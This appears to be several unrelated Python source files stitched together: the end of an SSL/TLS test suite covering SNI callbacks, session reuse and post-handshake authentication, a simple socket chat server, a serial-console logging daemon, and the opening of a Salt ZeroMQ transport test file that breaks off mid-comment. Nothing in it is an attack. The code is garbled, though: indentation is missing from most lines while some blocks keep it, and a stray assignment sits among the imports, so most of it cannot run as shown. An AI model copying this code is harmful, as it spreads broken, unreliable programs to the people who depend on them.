server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
client_context.check_hostname = False
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
        # SIGNED_CERTFILE2 (loaded into other_context) was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
expected_algs = [
"AES256", "AES-256",
# TLS 1.3 ciphers are always enabled
"TLS_CHACHA20", "TLS_AES",
]
stats = server_params_test(client_context, server_context,
sni_name=hostname)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if not any(alg in name for alg in expected_algs):
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
s = client_context.wrap_socket(socket.socket(),
server_hostname=hostname)
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(support.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(support.unlink, support.TESTFN)
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
with open(support.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
client_context, server_context, hostname = testing_context()
# TODO: sessions aren't compatible with TLSv1.3 yet
client_context.options |= ssl.OP_NO_TLSv1_3
# first connection without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
if ssl.OPENSSL_VERSION_INFO > (1, 0, 1):
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
client_context, server_context, hostname = testing_context()
client_context2, _, _ = testing_context()
# TODO: session reuse does not work with TLSv1.3
client_context.options |= ssl.OP_NO_TLSv1_3
client_context2.options |= ssl.OP_NO_TLSv1_3
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# can set session before handshake and before the
# connection was established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with client_context2.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
@unittest.skipUnless(ssl.HAS_TLSv1_3, "Test needs TLS 1.3")
class TestPostHandshakeAuth(unittest.TestCase):
def test_pha_setter(self):
protocols = [
ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS_SERVER, ssl.PROTOCOL_TLS_CLIENT
]
for protocol in protocols:
ctx = ssl.SSLContext(protocol)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.post_handshake_auth = True
self.assertEqual(ctx.post_handshake_auth, True)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, True)
ctx.post_handshake_auth = False
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.post_handshake_auth = True
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
self.assertEqual(ctx.post_handshake_auth, True)
def test_pha_required(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA method just returns true when cert is already available
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'GETCERT')
cert_text = s.recv(4096).decode('us-ascii')
self.assertIn('Python Software Foundation CA', cert_text)
def test_pha_required_nocert(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'PHA')
# receive CertificateRequest
self.assertEqual(s.recv(1024), b'OK\n')
# send empty Certificate + Finish
s.write(b'HASCERT')
# receive alert
with self.assertRaisesRegex(
ssl.SSLError,
'tlsv13 alert certificate required'):
s.recv(1024)
def test_pha_optional(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# check CERT_OPTIONAL
server_context.verify_mode = ssl.CERT_OPTIONAL
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_optional_nocert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_OPTIONAL
client_context.post_handshake_auth = True
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
                # optional doesn't fail when client does not have a cert
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
def test_pha_no_pha_client(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with self.assertRaisesRegex(ssl.SSLError, 'not server'):
s.verify_client_post_handshake()
s.write(b'PHA')
self.assertIn(b'extension not received', s.recv(1024))
def test_pha_no_pha_server(self):
# server doesn't have PHA enabled, cert is requested in handshake
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA doesn't fail if there is already a cert
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_not_tls13(self):
# TLS 1.2
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# PHA fails for TLS != 1.3
s.write(b'PHA')
self.assertIn(b'WRONG_SSL_VERSION', s.recv(1024))
def test_main(verbose=False):
if support.verbose:
import warnings
plats = {
'Linux': platform.linux_distribution,
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
with warnings.catch_warnings():
warnings.filterwarnings(
'ignore',
r'dist\(\) and linux_distribution\(\) '
'functions are deprecated .*',
DeprecationWarning,
)
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [
ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
SSLObjectTests, SimpleBackgroundTests, ThreadedTests,
TestPostHandshakeAuth
]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
thread_info = support.threading_setup()
try:
support.run_unittest(*tests)
finally:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
Py_chat_server.py
|
import socket
import threading
HOST = ''
PORT = 8888
ADDR = (HOST, PORT)
buff_size = 1024
clients = {}
addresses = {}
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(ADDR)
def handle_connection():
while True:
client, client_address = s.accept()
client.send(bytes('welcome', 'utf8'))
print("Connection from %s:%s" %client_address)
threading.Thread(target=handle_client, args=(client,)).start()
addresses[client] = client_address
def handle_client(client):
    client.send(bytes('Please enter your name', 'utf8'))
    name = client.recv(buff_size).decode('utf8')
    clients[client] = name
    msg = "Server:" + "Welcome, " + name + "!"
    broadcast(msg)
    while True:
        try:
            data = client.recv(buff_size)
        except OSError:
            data = b''
        if not data:
            # An empty read or a socket error means the client is gone;
            # drop it so broadcast() stops writing to a dead socket.
            print('Client %s closed connection' % name)
            clients.pop(client, None)
            addresses.pop(client, None)
            client.close()
            break
        broadcast(name + ":" + data.decode('utf8'))
def broadcast(msg):
for sock in clients:
sock.send(bytes(msg, 'utf8'))
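# A minimal client sketch for this server, assuming it is reachable on
# localhost:8888. The function name example_client and the sample name and
# message are made up for illustration; nothing here runs unless called.
def example_client(name='alice', host='127.0.0.1', port=8888):
    c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    c.connect((host, port))
    # The server sends 'welcome' followed by a name prompt; TCP gives no
    # message framing, so a single recv() may return one or both of them.
    print(c.recv(buff_size).decode('utf8'))
    c.send(bytes(name, 'utf8'))                 # register the name
    print(c.recv(buff_size).decode('utf8'))     # prompt and/or welcome broadcast
    c.send(bytes('hello everyone', 'utf8'))     # relayed to every connected client
    print(c.recv(buff_size).decode('utf8'))     # read whatever broadcast comes back
    c.close()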
if __name__ == "__main__":
s.listen(5)
print("Waiting for connection...")
main_thread = threading.Thread(target=handle_connection)
main_thread.start()
main_thread.join()
s.close()
|
cm_logger.py
|
#! /usr/bin/python3
#
# Copyright (c) 2017 Intel Corporation
#
# SPDX-License-Identifier: Apache-2.0
#
import errno
import logging
import multiprocessing
import os
import select
import time
import traceback
import serial
_spec_queue = None
def _spec_open_one(spec):
if isinstance(spec, str):
descr = serial.serial_for_url(spec)
descr.nonblocking()
return descr
elif isinstance(spec, dict):
# We have to remove the port thing for passing to the
# function, but we want to keep the original spec intact
_spec = dict(spec)
url = _spec.pop('port')
descr = serial.serial_for_url(url, **_spec)
descr.nonblocking()
return descr
else:
raise RuntimeError("Don't know how to open: %s" % spec)
def _spec_open(spec):
t0 = time.time()
timeout = 10
while True:
try:
t = time.time()
descr = _spec_open_one(spec)
logging.debug("open waited %.2fs for '%s' to appear",
t - t0, spec)
return descr
except (serial.SerialException, OSError) as e:
if t - t0 >= timeout:
logging.error("timeout (%.1fs) trying to open %s: %s",
timeout, spec, e)
raise
if e.errno == errno.ENOENT or e.errno == errno.EBUSY:
logging.debug("open waiting for '%s' to appear: %s",
spec, e)
time.sleep(0.25)
continue
logging.error("cannot open '%s': %s", spec, e)
return None
except Exception as e:
logging.error("cannot open '%s': %s", spec, e)
raise
reader_dict = dict()
poller = None
def _reopen(spec, logfile_name):
global reader_dict
global poller
logfile = open(logfile_name, "wb") # Open truncating
descr = _spec_open(spec)
    if descr is None:
return -1
logging.debug("fd %d[%s/%d]: (re)opened: %s",
descr.fileno(), logfile_name, logfile.fileno(), spec)
reader_dict[descr.fileno()] = (spec, logfile, descr)
poller.register(descr.fileno(),
select.POLLIN | select.POLLPRI \
| select.POLLERR | select.POLLHUP | select.POLLNVAL)
return descr.fileno()
def _write(fd, data, filename):
global reader_dict
global poller
if data:
logging.log(6, "fd %d: writing : \"%s\"", fd, data)
os.write(fd, data)
else:
logging.log(6, "fd %d: writing file contents: \"%s\"", fd, filename)
with open(filename, "rb") as f:
# FIXME: use sendfile, this won't work for big files, obvs.
os.write(fd, f.read())
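# One possible way to address the FIXME above: stream the file in fixed-size
# chunks instead of reading it whole. This is only a sketch; the helper name
# _write_file_chunked is not part of the original module and nothing calls it.
def _write_file_chunked(fd, filename, chunk_size = 16 * 1024):
    with open(filename, "rb") as f:
        while True:
            chunk = f.read(chunk_size)
            if not chunk:       # EOF reached
                break
            os.write(fd, chunk)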
def _reset(fd):
global reader_dict
spec = reader_dict[fd][0]
logfile = reader_dict[fd][1]
logfile_name = logfile.name
try:
logfile_fileno = logfile.fileno()
except ValueError as e:
logfile_fileno = -1
try:
while True:
s = os.read(fd, 1024) # Flush the input channel
            if s is None:
l = -1
else:
l = len(s)
logging.log(6, "fd %d[%s/%d]: flushed (%dB): %s",
fd, logfile_name, logfile_fileno, l, s)
            # FIXME: stop after flushing too much data; that would mean
            # the target did NOT stop or something is wrong
            if s is None or l <= 0:
break
except OSError as e:
logging.info("fd %d[%s/%d]: flush error, reopening: %s",
fd, logfile_name, logfile_fileno, e)
        # It's easier to just close and re-open everything
_close(fd)
        fd = _reopen(spec, logfile.name)
logfile = reader_dict[fd][1]
logging.debug("fd %d[%s/%d]: reset logger",
fd, logfile.name, logfile.fileno())
def _close(fd):
global reader_dict
global poller
spec = reader_dict[fd][0]
logfile = reader_dict[fd][1]
descr = reader_dict[fd][2]
try:
logfile_fileno = logfile.fileno()
except ValueError as e:
logfile_fileno = -1
logfile.close()
try:
poller.unregister(fd)
except KeyError:
pass
try:
descr.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
logging.debug("fd %d[%s/%d]: ignoring -EBADF on close()",
fd, logfile.name, logfile_fileno)
logging.debug("fd %d[%s/%d]: removed reader",
fd, logfile.name, logfile_fileno)
del spec
del descr
del logfile
del reader_dict[fd]
#
# This thread reads from all the file descriptors (normally describing
# serial consoles) given to the daemon. Note the daemon itself is the
# one that has to open the file descriptor, otherwise it might be
# another process.
#
def _reader_fn():
global _spec_queue
global reader_dict
global poller
poller = select.poll()
queue_fd = _spec_queue._reader.fileno()
logging.info("console logger thread")
while True:
try: # Make sure it is there (in
poller.register(queue_fd) # case an error took it out)
rs = poller.poll(1000) # Wait for activity
for r in rs: # Process said activity
fd = r[0]
# Handle management events first
if fd == queue_fd: # Read and discard
logging.log(8, "QUEUE fd %d, signalled 0x%x", fd, r[1])
o = _spec_queue.get_nowait()# just used to run the
                    if o is None:
logging.warning("QUEUE: woken up, but got nothing")
continue
logfile_name = o[1]
try:
if o[0] == 'add':
spec = o[2]
_reopen(spec, logfile_name)
elif o[0] == 'write':
for fd in list(reader_dict.keys()):
if reader_dict[fd][1].name == logfile_name:
_write(fd, o[2], o[3])
elif o[0] == 'rm':
for fd in list(reader_dict.keys()):
if reader_dict[fd][1].name == logfile_name:
_close(fd)
break
elif o[0] == 'reset':
for fd in list(reader_dict.keys()):
if reader_dict[fd][1].name == logfile_name:
_reset(fd)
break
else:
raise ValueError("Unknown action '%s'" % o[0])
finally:
_spec_queue.task_done()
del o
continue # Process next change
if not fd in reader_dict:
logging.debug("fd %d has been removed: 0x%x", fd, r[1])
continue
spec = reader_dict[fd][0]
logfile = reader_dict[fd][1]
logfile_name = logfile.name
try:
logfile_fileno = logfile.fileno()
except ValueError as e:
# If closed, just pass it on
logfile_fileno = -1
if r[1] in (select.POLLERR, select.POLLHUP, select.POLLNVAL):
# Something is wrong, let it be refreshed; be
# loud, normally this means something bad has
# happened to the HW or a lurking bug (file has
# been closed somehow).
logging.warning(
"BUG? fd %d[%s/%d]: has to be removed: 0x%x",
fd, logfile_name, logfile_fileno, r[1])
_close(fd)
_reopen(spec, logfile_name)
elif r[1] == select.POLLIN or r[1] == select.POLLPRI:
# Data is available, read in 1K chunks and record
# it [FIXME: consider using sendfile()].
try:
data = os.read(fd, 1024)
logging.log(7, "fd %d[%s/%d]: Read %dB: %s",
fd, logfile_name, logfile_fileno,
len(data), data)
except OSError as e:
logging.error(
"fd %d[%s/%d]: log read error, reopening: %s",
fd, logfile_name, logfile_fileno, e)
_close(fd)
_reopen(spec, logfile_name)
data = "[some data might have been lost]"
try:
os.write(logfile_fileno, data)
except OSError as e:
logging.error("fd %d[%s/%d]: log write error: %s",
fd, logfile_name, logfile_fileno, e)
                    del data # Ensure the data is gone
elif r[1] == errno.ENOTTY:
logging.info("fd %d[%s/%d]: reopen due to ENOTTY, "
"device replugging?",
fd, logfile_name, logfile_fileno)
_close(fd)
_reopen(spec, logfile_name)
else: # Me not know what you talking'bout
if r[1] != errno.ENODEV:
logging.error(
"fd %d[%s/%d]: Unhandled poll reason 0x%x",
fd, logfile_name, logfile_fileno, r[1])
else:
logging.info("fd %d[%s/%d]: device disconnected",
fd, logfile_name, logfile_fileno)
_close(fd)
# We do not reopen, usually this means the device is gone
except Exception as e:
logging.error("Unhandled reader thread exception: %s: %s",
e, traceback.format_exc())
def setup():
"""
FIXME
"""
global _spec_queue
_spec_queue = multiprocessing.JoinableQueue(100)
    # Background process that reads from all serial ports to a log file
reader = multiprocessing.Process(target = _reader_fn)
reader.daemon = True
reader.start()
logging.info("console logger launched")
# This is to be run by the master or other processes in the
# multiprocessing pool
def spec_add(logfile_name, spec):
"""
FIXME
"""
assert isinstance(logfile_name, str)
assert isinstance(spec, dict)
global _spec_queue
    if _spec_queue is None:
setup()
    # Wait here for the node to show up -- we'll also do it in the
    # loop for double checking, but here we don't block anyone and, if
    # it fails, we can tell the caller -- otherwise, just proceed and
    # let cm_logger open it (for which we have to close our handle again).
    # We can't open it and pass it to the caller because it is another
    # process.
descr = _spec_open(spec)
    if descr is not None:
descr.close()
del descr
else:
raise RuntimeError("Cannot open serial port (%s); is "
"ModemManager trying to scan it?" % spec)
_spec_queue.put(['add', logfile_name, spec])
_spec_queue.join()
logging.debug("%s: adding logger for '%s'", logfile_name, spec)
def spec_write(logfile_name, data = None, filename = None):
"""
Write to a file descriptor monitored by a logger
:param str logfile_name: Name of the logger to which file
descriptor to write to
:param data: data to be written; use this only for short amounts
of data
:param str filename: name of the file that contains the data that
has to be written, use this for longer data.
"""
global _spec_queue
# Either one has to be given, but not both
    assert (data is None) != (filename is None)
_spec_queue.put(['write', logfile_name, data, filename])
_spec_queue.join()
logging.debug("%s: wrote to logger", logfile_name)
# This is to be run by the master or other processes in the
# multiprocessing pool
def spec_rm(logfile_name):
global _spec_queue
_spec_queue.put(['rm', logfile_name])
_spec_queue.join()
logging.debug("%s: removing logger", logfile_name)
# This is to be run by the master or other processes in the
# multiprocessing pool
def spec_reset(logfile_name):
global _spec_queue
logging.debug("%s: resetting logger", logfile_name)
_spec_queue.put(['reset', logfile_name])
_spec_queue.join()
# Wait for queue to be flushed?
logging.debug("%s: reset logger completed", logfile_name)
|
test_zeromq.py
|
"""
:codeauthor: Thomas Jackson <jacksontj.89@gmail.com>
"""
import ctypes
import multiprocessing
import os
import threading
import time
from concurrent.futures.thread import ThreadPoolExecutor
import salt.config
import salt.exceptions
import salt.ext.tornado.gen
import salt.ext.tornado.ioloop
import salt.log.setup
import salt.transport.client
import salt.transport.server
import salt.utils.platform
import salt.utils.process
import salt.utils.stringutils
import zmq.eventloop.ioloop
from salt.ext.tornado.testing import AsyncTestCase
from salt.transport.zeromq import AsyncReqMessageClientPool
from saltfactories.utils.ports import get_unused_localhost_port
from tests.support.helpers import flaky, not_runs_on, slowTest
from tests.support.mixins import AdaptedConfigurationTestCaseMixin
from tests.support.mock import MagicMock, call, patch
from tests.support.runtests import RUNTIME_VARS
from tests.support.unit import TestCase, skipIf
from tests.unit.transport.mixins import (
PubChannelMixin,
ReqChannelMixin,
run_loop_in_thread,
)
x = "fix pre"
# support pyzmq 13.0.x, TODO: remove once we force people to 14.0.x
if not hasattr(zmq.eventloop.ioloop, "ZMQIOLoop"):
zmq.eventloop.ioloop.ZMQIOLoop = zmq.eventloop.ioloop.IOLoop
class BaseZMQReqCase(TestCase, AdaptedConfigurationTestCaseMixin):
"""
Test the req server/client pair
"""
@classmethod
def setUpClass(cls):
if not hasattr(cls, "_handle_payload"):
return
ret_port = get_unused_localhost_port()
publish_port = get_unused_localhost_port()
tcp_master_pub_port = get_unused_localhost_port()
tcp_master_pull_port = get_unused_localhost_port()
tcp_master_publish_pull = get_unused_localhost_port()
tcp_master_workers = get_unused_localhost_port()
cls.master_config = cls.get_temp_config(
"master",
**{
"transport": "zeromq",
"auto_accept": True,
"ret_port": ret_port,
"publish_port": publish_port,
"tcp_master_pub_port": tcp_master_pub_port,
"tcp_master_pull_port": tcp_master_pull_port,
"tcp_master_publish_pull": tcp_master_publish_pull,
"tcp_master_workers": tcp_master_workers,
}
)
cls.minion_config = cls.get_temp_config(
"minion",
**{
"transport": "zeromq",
"master_ip": "127.0.0.1",
"master_port": ret_port,
"auth_timeout": 5,
"auth_tries": 1,
"master_uri": "tcp://127.0.0.1:{}".format(ret_port),
}
)
cls.process_manager = salt.utils.process.ProcessManager(
name="ReqServer_ProcessManager"
)
cls.server_channel = salt.transport.server.ReqServerChannel.factory(
cls.master_config
)
cls.server_channel.pre_fork(cls.process_manager)
cls.io_loop = salt.ext.tornado.ioloop.IOLoop()
cls.evt = threading.Event()
cls.server_channel.post_fork(cls._handle_payload, io_loop=cls.io_loop)
cls.server_thread = threading.Thread(
target=run_loop_in_thread, args=(cls.io_loop, cls.evt)
)
cls.server_thread.start()
@classmethod
def tearDownClass(cls):
if not hasattr(cls, "_handle_payload"):
return
# Attempting to kill the children hangs the test suite.
# Let the test suite handle this instead.
cls.process_manager.stop_restarting()
cls.process_manager.kill_children()
cls.evt.set()
cls.server_thread.join()
time.sleep(
2
) # Give the procs a chance to fully close before we stop the io_loop
cls.server_channel.close()
del cls.server_channel
del cls.io_loop
del cls.process_manager
del cls.server_thread
del cls.master_config
del cls.minion_config
@classmethod
def _handle_payload(cls, payload):
"""
TODO: something besides echo
"""
return payload, {"fun": "send_clear"}
class ClearReqTestCases(BaseZMQReqCase, ReqChannelMixin):
"""
Test all of the clear msg stuff
"""
def setUp(self):
self.channel = salt.transport.client.ReqChannel.factory(
self.minion_config, crypt="clear"
)
def tearDown(self):
self.channel.close()
del self.channel
@classmethod
@salt.ext.tornado.gen.coroutine
def _handle_payload(cls, payload):
"""
TODO: something besides echo
"""
raise salt.ext.tornado.gen.Return((payload, {"fun": "send_clear"}))
@slowTest
def test_master_uri_override(self):
"""
ensure master_uri kwarg is respected
"""
# minion_config should be 127.0.0.1, we want a different uri that still connects
uri = "tcp://{master_ip}:{master_port}".format(
master_ip="localhost", master_port=self.minion_config["master_port"]
)
channel = salt.transport.client.ReqChannel.factory(
self.minion_config, master_uri=uri
)
self.assertIn("localhost", channel.master_uri)
del channel
@flaky
@not_runs_on(
kernel="linux",
os_familiy="Suse",
reason="Skipping until https://github.com/saltstack/salt/issues/32902 gets fixed",
)
class AESReqTestCases(BaseZMQReqCase, ReqChannelMixin):
def setUp(self):
self.channel = salt.transport.client.ReqChannel.factory(self.minion_config)
def tearDown(self):
self.channel.close()
del self.channel
@classmethod
@salt.ext.tornado.gen.coroutine
def _handle_payload(cls, payload):
"""
TODO: something besides echo
"""
raise salt.ext.tornado.gen.Return((payload, {"fun": "send"}))
# TODO: make failed returns have a specific framing so we can raise the same exception
# on encrypted channels
#
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
#
# WARNING: This test will fail randomly on any system with > 1 CPU core!!!
#
